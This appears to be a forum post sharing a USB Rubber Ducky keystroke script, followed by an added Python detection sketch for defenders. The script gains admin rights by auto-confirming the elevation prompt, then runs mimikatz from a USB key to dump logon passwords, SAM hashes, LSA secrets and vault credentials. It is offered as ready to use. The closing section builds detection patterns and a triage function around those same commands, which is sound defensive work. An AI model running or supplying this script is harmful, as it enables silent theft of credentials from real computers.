Hi everybody
After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex
Enjoy my script, and let me know if any improvement is needed (be nice, it's my first one)
DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT o
DELAY 250
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d
ENTER
DELAY 500
STRING cd /d %MIMIKEY%\
ENTER
DELAY 500
STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit
ENTER
DELAY 500
STRING exit
ENTER
You only need these at the root of the key:
mimikatz_x86.exe
mimikatz_amd64.exe
mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.
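For defenders, the commands this script types leave recognisable process-creation command lines (for example in Windows event 4688 with command-line auditing, or Sysmon event 1). The sketch below is an added example, not part of the original post: the indicator names, the `triage` function, the 60-second window and the sample events are all assumptions constructed for illustration. It matches on the module::command arguments rather than the file name, since the binary can be renamed.

```python
import re
from collections import defaultdict

# Patterns derived from the commands in the post; the indicator names are this example's own.
INDICATORS = {
    "elevated_cmd_via_powershell": re.compile(r'start-process\s+cmd\b.*-verb\s+runas', re.I),
    "volume_label_lookup": re.compile(r'\bwmic(\.exe)?"?\s+volume\s+get\s+driveletter', re.I),
    # module::command arguments still match when the executable has been renamed
    "credential_module_args": re.compile(
        r'\b(sekurlsa::(logonpasswords|ekeys)|lsadump::(sam|secrets)|'
        r'privilege::debug|token::elevate|vault::(cred|list))\b', re.I),
}

def match_indicators(cmdline):
    """Return the sorted indicator names that match one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))

def triage(events, window=60):
    """events: iterable of (epoch_seconds, host, cmdline); returns {host: severity}.

    'high'     = credential-module arguments seen on the host.
    'critical' = they follow an elevation or volume-label lookup on the
                 same host within `window` seconds (the sequence in the post).
    """
    verdicts = {}
    staging = defaultdict(list)  # host -> timestamps of elevation / volume lookup
    for ts, host, cmdline in sorted(events):
        hits = match_indicators(cmdline)
        if "credential_module_args" in hits:
            recent = any(0 <= ts - t <= window for t in staging[host])
            # never downgrade a host that is already 'critical'
            verdicts[host] = "critical" if recent else verdicts.get(host, "high")
        elif hits:
            staging[host].append(ts)
    return verdicts

# Constructed sample events (not real logs): timestamp, host, command line.
SAMPLE = [
    (1000, "WS01", "powershell Start-Process cmd -Verb RunAs"),
    (1003, "WS01", 'cmd.exe /c wmic volume get driveletter, label | findstr "MIMIKEY"'),
    (1005, "WS01", 'E:\\mimikatz_AMD64.exe "log WS01.log" privilege::debug sekurlsa::logonpasswords exit'),
    (2000, "WS02", "C:\\Temp\\svc.exe privilege::debug lsadump::sam exit"),
    (3000, "WS03", "wmic volume get driveletter, label"),
]

if __name__ == "__main__":
    for host, severity in triage(SAMPLE).items():
        print(host, severity)
```

WS03 gets no verdict because a volume lookup on its own is ordinary administration; it only raises severity when credential-module arguments follow on the same host.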